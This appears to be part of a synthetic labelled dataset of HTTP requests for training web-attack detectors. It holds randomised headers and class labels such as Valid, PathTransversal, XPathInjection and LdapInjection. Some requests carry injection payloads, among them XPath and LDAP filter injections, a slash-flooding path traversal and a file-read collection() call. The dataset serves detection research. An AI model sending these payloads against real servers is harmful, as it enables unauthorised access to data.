If-Unmodified-Since: Fri, 24 Mar 06 22:20:33 CET
If-Match: "mR8h8@0nytA5Zmrc5"
If-None-Match: "qEcRgPixmPjBd3aVS6c"
If-Range: Fri, 18 Jan 08 09:12:47 GMT
Max-Forwards: 631
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: usrfc5 s0lCaie=e9nig
Range: 6-267184,-1,5-7119
Referer: http://www.e2sxta.uk/teherafy/MGewci/thnur6S.dll
TE: chunked
Trailer: Accept-Charset
User-Agent: EytOSaal/6.4.0
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 116x668
Via: 2.4 www.aRTte6.jpg, 8.6 236.139.238.69
Transfer-Encoding: gzip
Upgrade: 8omcl/7.6
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 199.127.83.69
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28535
Start - Id: 45263
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.1
Host: www.14dnem.it
Connection: close
Accept: video/*;q=0.0, text/html, image/jpeg;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 201.215.206.187
Cookie: FnfdyedHaoen=aBY5;0oEttrhlmae=3o~;eube5stmaae=74
Cookie2: $Version="36"
Date: Sun, 16 Mar 08 24:29:14 GMT
ETag: W/"ba2N-LW3dBH.hNtm3T"
Expect: sdseNet=shmf
From: geleR@t0uaaRegG.gov
If-Modified-Since: Sat, 26 Jun 04 08:33:37 UTC
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 08 May 05 20:41:13 UTC
Max-Forwards: 91
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: heeno IeuEns=iPrerssw
Range: -249,23568-43
Referer: /ahckl/Iqonases/ehtseu.wav
TE: chunked
Trailer: Host
User-Agent: ea9e/9.8
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: deflate
Upgrade: t7aRna/4.0
Warning: 818 34.35.11.44 "vgorcns3pysalnN4" "Sat, 01 Dec 07 05:44:35 UTC"
X-Forwarded-For: 118.3.52.80
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45263
Start - Id: 33022
class: Valid
PUT /jxKU0dOinxjlEFN/mMTSPyR/nbYHuqDlU9LLm1o9fH/l6ilLaspRtlaknyrhsi/otXjgbwxfsOYFeSJQf/vHZd@75F7FjHN3YHp/n6Jel3jA85OKcvKd.cgi? HTTP/1.0
Content-Length: 196
Content-Language: e9
Content-Encoding: compress
Content-Location: /eAnsvA/ywrept25.php3
Content-MD5: Tm5pZGVvaXBSamVlZzdoYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 30 Dec 08 07:37:03 UTC
Last-Modified: Sun, 01 Jul 07 16:36:07 UTC
Host: www.oFil.st
Connection: keep-alive
Accept: audio/*, text/*;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 75.232.39.149
Cookie: mtllgejro=0663;en8dubxsn=ala(c;th=OVn5i2emtsnN3srt;2oedrdhw4e=06;3jcmdXQwSFJP=nda|aettmpmocha@tcmd5ton
Cookie2: $Version="120"
Date: Sun, 25 Dec 05 14:21:00 GMT
ETag: W/"rHnwjd4MwLBr-ZVI2"
Expect: 100-continue
From: ihYUAw@ivSmbM.it
If-Modified-Since: Mon, 29 Aug 05 08:54:00 CET
If-Unmodified-Since: Sat, 16 Jan 10 19:32:20 UTC
If-Match: *
If-None-Match: *
If-Range: "JgEfX7pCK3UeZLQQd"
Max-Forwards: 914
MIME-Version: 0.6
Pragma: heh377='ie3b'
Proxy-Authorization: Basic YmRDcWFlOmVnZWQ0bmU=
Authorization: NTLM cG9tMG5uY2V4bW90NG9zb2VyN2NzaFNPdG9jdHJuc2h0NnNicXRtU2VpaA==
Range: -653509,070-
Referer: /igeionw.mpg
TE: gzip,trailers
Trailer: User-Agent
User-Agent: rqdihEgeiet
UA-CPU: x86
UA-Disp: 4878,467,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 699x4175
Via: 6.1 www.ni5fttj.jpeg:7195, HTTP/5.1 25.209.24.244, HTTP/6.2 20.197.169.82
Transfer-Encoding: hinat; 1cestiwy=tssvcT
Upgrade: nlefj/7.3, ano/0.9
Warning: 229 3.87.67.188:155 "rolabuAsnlbse" "Mon, 12 Sep 05 12:07:12 GMT"
X-Forwarded-For: 101.97.72.137
X-Serial-Number: 131925
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DLGXv=9&75tkKPlqmeiM=loofiThsgsln&ghuO=3808643&d1=069471&oAs2yveo=8ohFl&rhmlyeANc=clo&6adminI6N=68931037&eo7thsx= rimbn&tn=ef\se2it3Rconnect&ouhrxttM=268&gsnff=pbybAv3ACIs&b4R=loge-oa&nnt=v%so

End - Id: 33022
Start - Id: 16610
class: Valid
GET /Uz/hu3/fT.sqjYmd/umtalhtxtTn/mB7/uzOwK/e4QwUsp/PiDmfyU/rrhcqu.jpeg?cst9weeeekEtN=ih&wirdsols7hswes=shGIR&n7ewn8ls8c=m9 HTTP/1.1
Host: 52.119.69.49:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 148.10.195.47
Cookie: h3stndnNe=o7wi;imbehtr=1jhjro4tuw &s~d
Cookie2: $Version="9"
Date: Tue, 02 Nov 04 01:34:45 CET
ETag: "qWgx7Kq1xVJ2JrPTa9F0"
Expect: 100-continue
From: dwou@hguthnrf9e.org
If-Modified-Since: Thu, 15 May 08 22:34:16 CET
If-Unmodified-Since: Thu, 08 May 08 22:25:12 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 8.3
Pragma: 6dsoe=e
Proxy-Authorization: Digest opaque="rpsns9"
Authorization: NTLM bGlhZWpldHh5cmkxZG9NcmRoZWh5ZWZsZTRtYW9lNHJ0aHRmaDdE
Range: 872-,754-,4693-
Referer: /ekw6n9e/sVtd/ehhdrrcn/aadiul5c/axz9Etb.txt
TE: deflate
Trailer: Connection
User-Agent: eAGa_9 http://www.stnush.de
UA-CPU: StrongARM
UA-Disp: 009,955,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 702x893
Via: FTP/2.8 www.Nirueo.png
Transfer-Encoding: gzip
Upgrade: Nca/5.9, s4h/1.3
Warning: 105 www.Ia3bwst.html "meseeoOE" 
X-Forwarded-For: 155.254.22.166
X-Serial-Number: 4070028617537255
----: --------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16610
Start - Id: 1182
class: Valid
GET /ihP3trdLrch/ewXmNjT3q4oM/rdZ/3OF1UKe/eghfoKejyt/snRjj1e2wmefs.cgi?hn=esN1rdrop7tsc&p0w4e6d6iinabae=anep&ewlntSf=sba%3Feyautoexeclo%5DTeaudone&ithrLpnet=5&rtUrzcaeoueh=3Cktrlocation%40Pn&E8tyorhiij=EnhaU6x&1resA=hkXiALHuGt&69xa38axxeocb=rcabYTy&CmmhB=bEr51V%40e&otererUNc=ryahdg&0ITUTNQ6=%5Ditn&WIlZ9SD=gn+%2B&3erioun0t=+Zis&5gte=%3Al+I HTTP/1.1
Host: www.besge.uk
Connection: keep-alive
Accept: image/*, image/*, audio/*
Accept-Charset: euc-jp, windows-874, x-mac-greek;q=0.1, x-mac-greek, iso-8859-5;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: zi=iiin
Client-ip: 3.77.130.73
Cookie: 8ewaeizaei=re0 Rtndmnua;sidedonizis=eAJL77oeD;kRV5-F3B=56;san=onwnreanla
Cookie2: $Version="39"
Date: Thu, 28 Dec 06 23:33:35 GMT
ETag: "PDK5R1bFXa2W3huBM"
Expect: 100-continue
From: lotyd@3e47eeHm.it
If-Modified-Since: Thu, 25 Oct 07 11:40:19 GMT
If-Unmodified-Since: Sun, 09 Nov 08 09:41:21 CET
If-Match: *
If-None-Match: "u2aL7R2ZdtjNqII"
If-Range: Wed, 25 May 05 05:14:38 GMT
Max-Forwards: 0954
MIME-Version: 4.8
Pragma: mia='s9sehehi'
Proxy-Authorization: NTLM dDg3bmlmVGxidm5BdDFldm90ZUZhb3RlbHJhRGhpYTlrcXJlV2hkaGUzeW5ldA==
Authorization: Basic eXdubjc6dHJva2hzcA==
Range: 8-,346-86
Referer: http://3le3Sre.be/mtbw/6nermao/twzes0M.cfm
TE: deflate;q=0.4,chunked,trailers
Trailer: If-Modified-Since
User-Agent: 6DXypD91@ http://www.dBpaoh.gov
UA-CPU: PowerPC
UA-Disp: 3549,296,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5650x6286
Via: HTTP/9.1 www.e5aumxae.png:00, 9.9 www.eo4eIetN.shtml:554
Transfer-Encoding: deflate
Upgrade: 3fe/6.8, 1l6r/0.4, neenia/6.4, aut/5.3, uwrb/3.2
Warning: 126 www.zrkt.css "iaNl" 
X-Forwarded-For: 161.167.26.165
X-Serial-Number: 83434025
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1182
Start - Id: 48810
class: XPathInjection
GET /Y4bdropBTYTTuvbscriptb/tnb09gcuh2Mfihe/aynLdp.mdb?fuzRrtaec=1+or+++1%3C++j%2Fs4in%2Flal%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D548%5D+++or+5272%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&smq6d4a=ptse9wximZee8j&pngnwec2cu=hTrh%3Eaehcynr HTTP/1.0
Host: www.nesw.gov:80
Connection: keep-alive
Accept: text/*;q=0.9, application/*;q=0.6, image/*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.5, identity, deflate;q=0.7, gzip, identity
Accept-Language: lsnk-ttrIrti;q=0.8, hoi-ermwVio;q=0.9
Cache-Control: no-store
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Thu, 06 Apr 06 21:48:50 GMT
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 2geofch9@4eke.org
If-Modified-Since: Sat, 29 Aug 09 23:20:12 UTC
If-Unmodified-Since: Tue, 26 Apr 05 09:03:16 GMT
If-Match: "RZRPaDDHmd0hHYrKxZ"
If-None-Match: "o@a@6..Kgx04Ue3"
If-Range: Wed, 12 May 04 20:48:31 UTC
Max-Forwards: 6
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: /d9het/rhutrtz9/lan4mep/dageEcq/if1now.css
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: 8Tsealk6n/1.5.6.5.5
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: 1.0 www.NMtoE5t.htm, FTP/0.3 137.181.39.53, 6.3 www.nvtb1.gif
Transfer-Encoding: compress
Upgrade: 71emX/6.2, hao/6.3, scEf4/7.0
Warning: 989 42.33.152.171 "ej9c" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48810
Start - Id: 25194
class: Valid
GET /oadaedws/4d48CtfxrEu/tYUJJ4.LaDvEY/5iaiw.css?CuwRDR=ftE0a%3D%3Ecoei%27&8er=lIE3yBD&teo=3625855761&dtAmeeece8tiug=h9q-RV&abteLipcdznn=l8sTgt&tanoysvruttizr5=6045775 HTTP/1.0
Host: 143.79.219.80
Connection: close
Accept: image/*, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: eds4hug-saoid5, rea-r5iil;q=0.1
Cache-Control: no-store
Client-ip: 145.24.89.152
Cookie: Es1=563;tida=66eSah>eg[ufxs
Cookie2: $Version="10"
Date: Thu, 18 Aug 05 03:46:55 UTC
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: lGerd16@hdnad.be
If-Modified-Since: Mon, 01 May 06 20:02:14 GMT
If-Unmodified-Since: Sun, 09 May 04 04:14:52 CET
If-Match: "GqKZ2PRgeppSb4YJ."
If-None-Match: "EPY_Cd4WIkFVmdC2F0wv"
If-Range: *
Max-Forwards: 911
MIME-Version: 2.8
Pragma: cat3r='j1Tc5sx'
Proxy-Authorization: NTLM MnNlbHNlcnN3SW9hdGFiMW9lb2RPUnRyOGlveXFnTUJ1ZXR1Y2Fhckxyb0FhTzJo
Authorization: Digest algorithm=MD5-sess
Range: -19,-098,214486-
Referer: /azwsh.bin
TE: deflate;q=0.6,chunked,trailers
Trailer: Trailer
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 1.5; gw-Fa; rv:1.5.4) Gecko/62152813
UA-CPU: x86
UA-Disp: 334,5908,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5457x802
Via: 1dr6d/8.1 www.fihq.gif
Transfer-Encoding: deflate
Upgrade: tIis/4.6
Warning: 067 www.tonno.jpeg "dhcphuieclhefe" 
X-Forwarded-For: 79.117.124.22
X-Serial-Number: 39906730696975900354
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25194
Start - Id: 1615
class: Valid
GET /fycac8G/uufnpmt/ahmatgz/dtniaecehn/rhaesVeysm18r.jpg? HTTP/1.1
Host: www.mahtdio9.gov
Connection: m8tlN
Accept: */*;q=0.8
Accept-Charset: iso-8859-8-i
Accept-Encoding: 
Accept-Language: rth-il7o6k, 4-enet;q=0.8, alkoeb-nkeNoKdd;q=0.5
Cache-Control: no-cache
Client-ip: 237.160.190.249
Cookie: nnwtunnn=j<Nsi9aiihpaa;hoybooe=10;aTEwozv=d~nsscopy;syte7iioEfg=408335;lg=re2tbetween
Cookie2: $Version="28"
Date: Sun, 25 Dec 05 12:14:20 GMT
ETag: W/"u6G41g@Pc3J8_B0"
Expect: peSg8cht=iioian
From: blen@dpceh2t.ch
If-Modified-Since: Sun, 21 Feb 10 10:41:51 UTC
If-Unmodified-Since: Sat, 14 Nov 09 13:12:20 CET
If-Match: *
If-None-Match: "dx6pClckYyEfO3a5RSW"
If-Range: "HWBxFNrBrMurE9G2"
Max-Forwards: 0452
MIME-Version: 4.9
Pragma: alSlRrta=assca
Proxy-Authorization: Basic aWxnQTp0c2Vy
Authorization: Digest response="A8cde82e8bfCe4531Fcc3cD21Ee0e132"
Range: -60187,7-
Referer: /o6ttakr.tar
TE: deflate,gzip;q=0.2,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 9.2; e4-sG; rv:3.8.4) Gecko/66631825
UA-CPU: PowerPC
UA-OS: Win95
UA-Color: color16
UA-Pixels: 784x552
Via: 6.1 www.4aaCyj.tiff, 8.6 www.uec7jsg.htm
Transfer-Encoding: es8o
Upgrade: sTSZ/4.6, yc0et/6.6
Warning: 478 www.2leHh0te.css:121 "aurisc" 
X-Forwarded-For: 219.253.153.237
X-Serial-Number: 3408188061455384111
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1615
Start - Id: 34186
class: Valid
POST /-A0dOvr1uNnf/et/tV1gTNMudDWNitMyTGO/yBXq0aYoscDU0kKA-/adminopendH/xL.gB58aDU_bYlcH/swwtag/l.V8IFRgWj/t9E19Wpg5qs.mspx? HTTP/1.1
Content-Length: 85
Content-Language: ise,mptaqve,N9e1n9c
Content-Encoding: deflate
Content-Location: http://www.rkiRdub8.fr/suSa9tiN/e8nqr.tar.gz
Content-MD5: YXJpZXJVbmM2ZHFuNWV5dg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Jun 05 13:11:04 CET
Last-Modified: Mon, 10 Mar 08 04:44:30 UTC
Host: 57.151.245.40:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 226.43.30.101
Cookie: se8Rlirpen=trlash bnesystem4A;8HciIazonsutot=yS5v;GevneRncdoeue=hielQ;ewtepeaaasSru3=<n;syse6moa8=87376970
Cookie2: $Version="08"
Date: Sat, 08 Nov 08 14:55:10 UTC
ETag: "ehlGSz.VF..ZXY@"
Expect: 100-continue
From: ohlyy@feemi6ooi.ch
If-Modified-Since: Fri, 28 Oct 05 13:09:35 UTC
If-Unmodified-Since: Thu, 10 Sep 09 01:57:15 GMT
If-Match: "gV4OMxY4YQ1HywCCRrL"
If-None-Match: *
If-Range: "e5n3Ki-o-_zBLEc"
Max-Forwards: 9422
MIME-Version: 9.3
Pragma: efea9io=Odoeusi
Proxy-Authorization: Digest username="pcny3"
Authorization: tee8Or yndng=slseSssf
Range: -23,3-
Referer: /1rr7.pdf
TE: trailers,trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/2.0 (Windows; U; Win98 9.8; at-s4; rv:2.7.2) Gecko/38156891
UA-CPU: 68000
UA-Disp: 892,7658,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 2584x7510
Via: 6.6 www.hmurtL3s.gif, HTTP/3.4 www.lfEaytum.gif:87
Transfer-Encoding: oeie
Upgrade: ciwqt/3.9, Ltten/0.9
Warning: 577 www.iatho3sd.html:85826 "eyhmejnm9eoqif6ur52E" 
X-Forwarded-For: 39.178.242.76
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hrt7aa1i=l0n3&t1ioaq5it=09834552&di2=5Q@KxUOIu89u&TsowbN=s.ZV7xqCOG&eeaoaao=8123991

End - Id: 34186
Start - Id: 25269
class: Valid
GET /ayRY/noO5IatqTt.exe?ttx=ujmwot8oa%3Asij HTTP/1.0
Host: www.nntn.st:8
Connection: keep-alive
Accept: image/gif, application/*;q=0.5
Accept-Charset: gb2312
Accept-Encoding: *
Accept-Language: pso-eedl, shmrre-gyagm;q=0.0
Cache-Control: msd='da'
Client-ip: 142.23.146.55
Cookie: c5Stae4rsat=ntie;iO=53;hy6hselaiz=35534;havingXBFB=57;nm=967753;roEi=386328
Cookie2: $Version="33"
Date: Thu, 10 Dec 09 10:57:30 CET
ETag: W/"6ritmTsIlhNxBiznf"
Expect: 100-continue
From: ztFt@noIhnaS.de
If-Modified-Since: Fri, 27 May 05 17:47:40 CET
If-Unmodified-Since: Thu, 13 Jan 05 11:32:54 CET
If-Match: "_8@4Eg36ZEsXTrC_v8mk"
If-None-Match: *
If-Range: *
Max-Forwards: 5901
MIME-Version: 4.0
Pragma: Loe=5S
Proxy-Authorization: Basic b3MzOWhBbjpQdXJhc24=
Authorization: Digest opaque="gseern"
Range: 04-39299,179937-1471,76-
Referer: /i3O8/eaoeSarh/ia3b.css
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/8.1 (X11; U; Open BSD i386 9.7; SN-ct; rv:2.5.6) Gecko/35582018
UA-CPU: x86
UA-Disp: 8204,1865,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 4028x8502
Via: h6s/0.9 18.80.62.142, 4.8 www.sak7tnk.png, 3.1 www.aiAcni.html
Transfer-Encoding: deflate
Upgrade: smn6/9.9, tqura/5.8, omdo/1.2, eil2/4.6
Warning: 741 4.215.113.72 "rtadv" "Sun, 22 Aug 04 14:34:46 UTC"
X-Forwarded-For: 249.207.205.242
X-Serial-Number: 139373036597408522
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25269
Start - Id: 23484
class: Valid
GET /cX5ly8@fWCO/ugISd0gzP30Q-wgqoR/ciDfuos5dEt2hih/ujlhLma7amcl/8ec/nawtlpdeen.php?tiitnetc=oCf HTTP/1.0
Host: www.hrwnt.ch:80
Connection: close
Accept: audio/basic, text/html, application/*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: identity;q=0.1, compress, deflate;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 248.202.62.202
Cookie: BKCVp7R4K=767;TwbK=aanozhtacces0d;uheb4aodefeaEhn=ir:0dlocatione[Rdhau);6cY3esissfsa=nQXyO;Ysg=86941
Cookie2: $Version="651"
Date: Tue, 20 Nov 07 09:34:23 GMT
ETag: "qQRgOPnnphH-XIbwa"
Expect: 100-continue
From: iarze6@uh4uku.biz
If-Modified-Since: Thu, 02 Aug 07 16:28:23 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:42:44 UTC
If-Match: *
If-None-Match: "qHF29ijynKdF.Uen"
If-Range: Wed, 24 Feb 10 11:45:47 CET
Max-Forwards: 1790
MIME-Version: 2.0
Pragma: hfygr5Fq=I2fcic
Proxy-Authorization: NTLM c2l3ZDVuc2VrN2VjYW5ldGx5aXpORXlFaHNvdmV0b2R0ZXNldTNza2Rzb2lkdQ==
Authorization: NTLM Njlubml6b2hyZGhlTWFhNWlqZE4yazJ0N3RhaDVSTmxlaHVTcjdtaTJudA==
Range: 43-,164-
Referer: /iposer.gif
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 4.8; c5-ml; rv:5.5.1) Gecko/12606662
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7794x3946
Via: 9.2 49.81.210.186:7
Transfer-Encoding: identity
Upgrade: odtm/1.2, aeaecO/2.0, kiaadd/9.4, naysa/3.6
Warning: 162 www.onsae.html:24586 "ehtavthpd" "Fri, 12 Jan 07 10:10:18 GMT"
X-Forwarded-For: 146.71.117.9
X-Serial-Number: 22339968152502117473
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 23484
Start - Id: 27152
class: Valid
GET /8.t_gjfikWVsZB.exe?aOeyeduitc6il=iVZSCVCwqU0f&5dahxeatepo=alleenphpdt HTTP/1.1
Host: 5.158.188.232:80
Connection: 6ete
Accept: */*;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=9804
Client-ip: 198.90.183.128
Cookie: 4SkrErea4r53ve=1;ocv8kA=caenf
Cookie2: $Version="32"
Date: Wed, 25 Apr 07 02:59:34 UTC
ETag: "EqroVsI170GggWVYKj"
Expect: 100-continue
From: tiqc@jnte.gov
If-Modified-Since: Mon, 01 Mar 10 02:33:34 GMT
If-Unmodified-Since: Fri, 13 Mar 09 10:10:16 UTC
If-Match: *
If-None-Match: "GukGMT3iN1_suKq8ah0"
If-Range: Mon, 08 Nov 04 04:53:44 GMT
Max-Forwards: 8521
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest username="eiadaa"
Authorization: Basic c0ZNUmx6ZTpvdXRx
Range: 1622-
Referer: /oieimeo/t34eeBa.sh
TE: trailers,chunked
Trailer: Accept
User-Agent: Mozilla/8.9 (X11; U; Linux i586 6.9; oz-5c; rv:0.6.6) Gecko/42366450
UA-CPU: MIPS
UA-Disp: 137,543,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7096x553
Via: 4.0 24.19.116.106
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 183.28.170.69
X-Serial-Number: 0352610
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 27152
Start - Id: 44847
class: PathTransversal
GET /y@BCMq5kRCRouH/i0eerisidthndwz/taehtkt52t/f1fTVKeFu-cqyC/rX7dS9/ti7t1sltaeGm2sncattg/rbnTao7qnceobzl/fhlp.s41KH/PLftZQ0T/exDgtYmEdrVC3pa81/e2Bdansaois3ntinec/apsueae.jpeg?q9nsoaTu8qan4r=collection%28+file%3A%2F%2F%2Fc%3A%2F7metn%2FalhnIbie.xml%29&bhkekxsSar=0&OaA=6865437&zsiqnseapa4q0u=Au&pef=c8htelnetzirT%27mto%3B&ehoz2ahtegiOa=knajrunzmhlll HTTP/1.0
Host: www.Eetvepy.gov
Connection: close
Accept: video/*, video/*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=157
Client-ip: 55.4.250.85
Cookie: tue= ta;SmBw=oNtR;shwntsos==|;rapNetuo7=50823390;Ysv_homeW=Ste=Z
Cookie2: $Version="051"
Date: Mon, 18 Oct 04 09:53:39 GMT
ETag: W/"eWSmgy4O4E8KbW15NvP"
Expect: ieqe
From: hohEtsbm@c8e2atu1l.be
If-Modified-Since: Wed, 04 Mar 09 02:05:25 GMT
If-Unmodified-Since: Mon, 02 Jul 07 16:23:38 CET
If-Match: "cbCU59-y5K@jV.zw"
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.5
Pragma: nmb1l=wewhttdc
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: NTLM ZW90Y25oMHJwcm1ob25vb2JjamVmcmFSZ25lb2hzc3I=
Range: 776321-,6-
Referer: /aoaI.gif
TE: gzip;q=0.2,trailers
Trailer: From
User-Agent: Mozilla/0.4 (compatible; MSIE 7.5; Open BSD i586; dseaaoonon)
UA-CPU: StrongARM
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: FTP/4.6 245.27.1.119:9011, 2.4 www.iy6g.png, 8.5 www.hhueP.gif
Transfer-Encoding: etaite; x1hgeh=nuoa
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44847
Start - Id: 38124
class: LdapInjection
GET /9urw/sggNihqR/adlsoAi9htrth.js?Dse=ztelnet%3Esbwetvrta%5Dp+9steh&tleN71ioaaI=rh&oaoxae1myvaeh=33078&o7yceuiiaor=iLv&ad7nusmjMakyoi=086771&Ai=tsst&ioii=%29+%28++++%7C%28+cn%3D*o+++%27brien*+++%29%28mail+%3D*o++%27brien*++++%29++&78lnymkncdesl=2%29ncnkotsemri&Boioo=bsjoftiwtmtdstbt&te=h%40PLXU&5dbwE9sscripte4=amt&roAdoemhlOrTrc8=0fe8iazvnL7obnxn9&idX68kU_plk=lvye1we6i HTTP/1.1
Host: 0.121.62.58
Connection: close
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.1
Accept-Encoding: 
Accept-Language: eu-ah1nttOa;q=0.5, e-grr9i, beah-lkgNd
Cache-Control: max-age=9
Client-ip: 76.39.81.250
Cookie: fp9McEBB5=aQ5YOl;71ttSes=titXDf;idq=680;zesx3f9neatat=1
Cookie2: $Version="2"
Date: Fri, 03 Jul 09 08:31:14 CET
ETag: W/"XSJy2BP.3@6hcqV.O8h6"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Thu, 30 Aug 07 03:30:15 UTC
If-Unmodified-Since: Fri, 31 Mar 06 07:11:04 CET
If-Match: "vIbaxHQqUtZ1XmV03qxq"
If-None-Match: *
If-Range: Thu, 07 Jan 10 15:03:14 CET
Max-Forwards: 4443
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: Digest algorithm=MD5-sess
Range: 17768-5
Referer: /enbu/8sihhp/r2og/iuuOfc/jtsrcte.ace
TE: trailers,chunked
Trailer: Trailer
User-Agent: s1nen5
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 846x668
Via: 3.4 www.tldoTlna.jpg, HTTP/4.6 133.110.171.24
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38124
Start - Id: 33859
class: Valid
PUT /Bwp-_rqnform4O.png? HTTP/1.0
Content-Length: 184
Content-Language: ii
Content-Encoding: identity
Content-Location: /oh1hT6/trti.msf
Content-MD5: dXNlU29iV3VhdG5hZ3N0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jan 04 02:11:26 CET
Last-Modified: Wed, 27 Jun 07 17:45:18 CET
Host: 243.245.151.65
Connection: tOuxe5tT
Accept: text/*, video/*
Accept-Charset: windows-1258;q=0.8, hz-gb-2312
Accept-Encoding: compress;q=0.6
